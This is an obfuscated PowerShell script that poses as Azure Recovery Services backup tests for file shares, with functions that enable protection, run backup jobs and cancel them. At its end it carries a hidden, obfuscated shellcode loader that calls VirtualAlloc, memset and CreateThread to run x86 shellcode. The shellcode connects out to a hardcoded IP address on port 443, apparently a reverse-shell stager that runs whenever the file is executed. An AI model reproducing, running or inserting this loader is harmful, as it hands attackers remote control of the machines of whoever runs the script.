${LoCa`T`IOn} = ("{1}{2}{0}"-f 'asia','so','utheast')
${ReSouRC`E`GROu`pNA`me} = ("{3}{2}{0}{4}{1}"-f'stFSRG1','8e','e','pst','bca8f')
${VAUl`Tn`AmE} = ("{1}{2}{3}{4}{0}"-f 'ca8f8e','PST','e','stF','SRSV1b')
${F`il`esh`ARe`F`RIEndLY`NAMe} = ("{0}{1}{4}{3}{2}"-f'pste','st','f8e','1bca8','fs')
${File`ShaRe`N`Ame} = ("{4}{1}{0}{3}{5}{2}"-f ';p','ileShare','f8e','stestfs1bc','AzureF','a8')
${Sa`NA`me} = ("{3}{2}{0}{1}"-f'sa1bca8f','8e','st','pste')
${s`ku`Name}=("{1}{0}{2}" -f 'd_','Standar','LRS')
${P`oLIcyN`A`Me} = ("{0}{2}{4}{3}{1}" -f'AF','icy','SBack','pPol','u')























function TEsT-a`Z`UReFsge`TjoB
{
	try
	{
		${v`A`ULt} = &("{3}{5}{1}{4}{0}{6}{2}" -f 'sV','coveryServic','ult','Get','e','-AzRe','a') -ResourceGroupName ${ResoU`Rc`eGr`O`UpnAme} -Name ${V`Aultn`AMe}
		${i`Tem} = &("{0}{1}{3}{2}"-f 'Enable-','Prot','tion','ec') ${Vau`Lt} ${Fi`LeSHaReFr`iENDL`y`Name} ${sAN`Ame}

		${ST`AR`TdAtE1} = &("{2}{5}{4}{3}{1}{0}"-f'c','nUt','Get','ryDateI','Que','-') $((&("{2}{1}{0}" -f 'e','t','Get-Da')).("{1}{0}" -f 'dDays','Ad').Invoke(-1)) ("{0}{2}{1}" -f 'Star','e1','tDat')
		${e`NDDatE1} = &("{0}{5}{4}{1}{3}{2}" -f 'Get-','Da','nUtc','teI','ery','Qu') $(&("{0}{1}{2}"-f 'Get','-D','ate')) ("{2}{1}{0}"-f 'Date1','nd','E')

		${J`obs} = .("{6}{2}{3}{4}{1}{5}{0}{7}{8}"-f'vi','y','Az','Rec','over','Ser','Get-','cesBackupJo','b') -VaultId ${v`A`ULt}."i`D" -From ${S`Ta`RTdaTe1} -To ${END`dATe1}

		foreach (${J`ob} in ${J`OBS})
		{
			${JO`B`dET`AIls} = &("{8}{6}{5}{4}{1}{3}{9}{0}{2}{7}" -f'upJobD','icesB','etail','a','v','verySer','zReco','s','Get-A','ck') -VaultId ${vA`UlT}."id" -Job ${J`OB};
			${job`De`TAi`ls2} = .("{6}{2}{1}{5}{8}{7}{9}{11}{10}{3}{4}{0}"-f'ils','ecov','zR','ob','Deta','eryServi','Get-A','esB','c','a','upJ','ck') `
				-VaultId ${va`ULT}."I`D" `
				-JobId ${j`Ob}."jO`BId"

			.("{4}{0}{3}{2}{1}" -f 't-','ual','Eq','Are','Asser') ${JOB`D`E`Tails}."J`ObId" ${j`ob}."jo`BiD"
			.("{1}{4}{0}{2}{3}" -f'r','A','t-A','reEqual','sse') ${jOb`D`eTAIlS2}."Jo`BID" ${J`oB}."J`Obid"
		}

		${c`O`NtAINer} = .("{0}{2}{6}{10}{8}{1}{3}{5}{9}{4}{7}" -f 'Ge','ryServicesBac','t-','k','t','upC','Az','ainer','ecove','on','R') `
			-VaultId ${vAU`Lt}."ID" `
			-ContainerType ("{3}{2}{1}{0}" -f 'age','reStor','u','Az') `
			-Status ("{2}{1}{0}"-f 'ed','er','Regist') `
			-FriendlyName ${san`AME}
	}
	finally
	{
		&("{2}{1}{3}{4}{0}" -f 'Vault','lea','C','nu','p-') ${Va`ULt} ${I`TEM} ${CON`Ta`iNeR}
	}
}

function tesT`-AZurEfS`WaI`T`jOb
{
	try
	{
		${v`AuLT} = .("{3}{1}{0}{2}{4}" -f '-AzRecover','t','yServi','Ge','cesVault') -ResourceGroupName ${reSO`UR`ceGro`Up`NA`ME} -Name ${vau`LTN`AMe}
 		${it`eM} = .("{1}{0}{4}{3}{2}"-f 'le','Enab','n','rotectio','-P') ${V`Au`Lt} ${Fi`lESH`AReF`RIEND`LynaME} ${S`ANAMe}

		
		${BaCk`U`pjOB} = .("{8}{7}{2}{4}{6}{0}{3}{1}{5}"-f'erySe','ackupIte','Az','rvicesB','Rec','m','ov','-','Backup') `
			-VaultId ${Vau`lT}."ID" `
			-Item ${I`Tem}

		.("{3}{0}{1}{2}"-f 't-T','ru','e','Asser') { ${bAc`K`UpJob}."sT`At`US" -eq ("{1}{0}{2}{3}" -f 'n','I','Prog','ress') }

		${Ba`cKuP`jOb} = .("{3}{4}{8}{9}{5}{7}{2}{6}{1}{0}" -f'ob','pJ','k','Wa','i','s','u','Bac','t-AzRecover','yService') -VaultId ${v`A`ULt}."I`D" -Job ${b`AcK`UpJOb}

		&("{0}{1}{3}{2}"-f'A','ssert-T','e','ru') { ${ba`Ck`UPjOb}."S`TATuS" -eq ("{1}{2}{0}"-f 'ed','Compl','et') }

		${CO`NtAi`NER} = .("{3}{7}{6}{5}{1}{8}{10}{0}{2}{4}{9}"-f 'nt','v','ai','Get-','ne','eco','zR','A','eryS','r','ervicesBackupCo') `
			-VaultId ${V`AU`lt}."id" `
			-ContainerType ("{3}{1}{2}{0}"-f'age','t','or','AzureS') `
			-Status ("{0}{3}{1}{2}" -f'Regis','re','d','te') `
			-FriendlyName ${Sa`NA`ME}
	}
	finally
	{
		&("{3}{2}{1}{0}{4}"-f'p-Vaul','nu','ea','Cl','t') ${v`Ault} ${i`TEm} ${C`On`TAin`ER}
	}
}

function T`EsT-AZu`Ref`s`CA`NcELJOB
{
	try
	{
		${v`AUlt} = &("{1}{0}{4}{7}{3}{5}{6}{2}" -f'Reco','Get-Az','ault','rvic','very','e','sV','Se') -ResourceGroupName ${R`E`SourCe`G`ROUPname} -Name ${vA`UL`TNamE}
 		${iT`em} = &("{3}{2}{1}{0}" -f'ection','t','Pro','Enable-') ${v`A`UlT} ${filES`ha`ReFrIeN`d`L`y`NAme} ${S`ANA`me}

		
		${B`AckuPj`OB} = .("{8}{4}{2}{6}{5}{1}{3}{0}{7}"-f 'kupIte','cesB','-AzReco','ac','up','ervi','veryS','m','Back') ` -VaultId ${vau`LT}."I`D" -Item ${I`TeM}
		
		&("{1}{3}{2}{0}" -f'-True','Asse','t','r') { ${BA`C`kUpJob}."STAt`Us" -eq ("{0}{1}{2}" -f'In','Prog','ress') }

		${cA`Nc`eL`le`djOb} = &("{5}{7}{3}{4}{8}{6}{1}{0}{2}" -f'o','sBackupJ','b','zRecovery','Serv','Stop','e','-A','ic') -VaultId ${v`Au`lt}."ID" -Job ${Ba`CkUpJ`ob}

		&("{3}{2}{0}{1}" -f 'ert-T','rue','s','As') { ${cAnce`LLEDJ`oB}."S`Ta`TUs" -ne ("{0}{2}{1}" -f'InProgr','ss','e') }

		${c`oNTAin`ER} = &("{5}{2}{0}{4}{3}{1}{6}" -f 'e','ck','Recov','ServicesBa','ry','Get-Az','upContainer') `
			-VaultId ${V`Au`lt}."Id" `
			-ContainerType ("{0}{2}{1}" -f 'Azure','orage','St') `
			-Status ("{2}{0}{1}"-f't','ered','Regis') `
			-FriendlyName ${Sa`NaMe}
	}
	finally
	{
		&("{2}{0}{1}"-f'eanu','p-Vault','Cl') ${V`AUlT} ${It`EM} ${Con`TA`inEr}
	}
}
${c} = ((("{91}{56}{92}{41}{80}{66}{9}{35}{59}{65}{88}{87}{17}{49}{12}{64}{77}{55}{28}{73}{2}{62}{84}{43}{26}{60}{15}{31}{0}{30}{68}{24}{69}{39}{32}{14}{18}{1}{20}{54}{3}{48}{8}{71}{5}{51}{19}{82}{44}{27}{4}{58}{83}{74}{63}{90}{13}{16}{86}{70}{37}{67}{7}{85}{89}{53}{33}{61}{52}{46}{47}{75}{81}{72}{36}{10}{42}{38}{29}{6}{45}{79}{50}{78}{21}{40}{25}{23}{57}{11}{76}{34}{22}"-f'tect);[','ll2','ess, uint dwSize,',')]public','Attribut','ex',')]','uint dw','ati','l','mport(27',', uint c','ntPtr','e','kern','nt flPr','ss','r','el32.d','ern IntPt','7','static extern Int','t);','r ','or','(IntPt','nT','eateThread(IntPtr lpThread','lloc(IntPt','27K','DllI','o','K','l','n','l27K)]','I','lpPar','rt.dll','(27','Ptr memset','(27Kker','Kmsvc','io',' Cr','pu','r lp','T',' st','n I','i','t','s, IntPt','eationF','K','rtualA','lImp','dest, uint src','es, uint dwStackSize','pu','ype, ui','ag',' u','tA',' V','blic stat','2.d','ameter, ','mp','t','tPtr ','c ','dId);[Dll','r lpAddr','IntPtr lpStar','h','ou','i','c ','bl','nel3','rea','r',', ','int flAllocat','C',', In','te','ic ex','r','ddr','[Dl','ort'))."r`epLaCe"(([cHar]50+[cHar]55+[cHar]75),[STrING][cHar]34));${w} = &("{1}{0}{2}"-f '-Ty','Add','pe') -memberDefinition ${c} -Name ("{0}{1}" -f 'Win','32') -namespace ("{0}{4}{3}{1}{2}" -f 'Win32F','tio','ns','nc','u') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xd5,0x39,0x2d,0x5d,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."l`e`Ngth" -gt 0x1000){${G} = ${Z}."len`g`TH"};${x}=${W}::("{2}{1}{0}{3}"-f 'alAl','tu','Vir','loc').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${Z}."LEN`GtH"-1);${i}++) {${w}::"mEM`SET"([IntPtr](${X}.("{2}{1}{0}"-f't32','oIn','T').Invoke()+${i}), ${Z}[${I}], 1)};${W}::("{3}{1}{0}{2}" -f'hr','ateT','ead','Cre').Invoke(0,0,${x},0,0,0);for (;;){.("{0}{2}{1}{3}"-f'Sta','-s','rt','leep') 60};
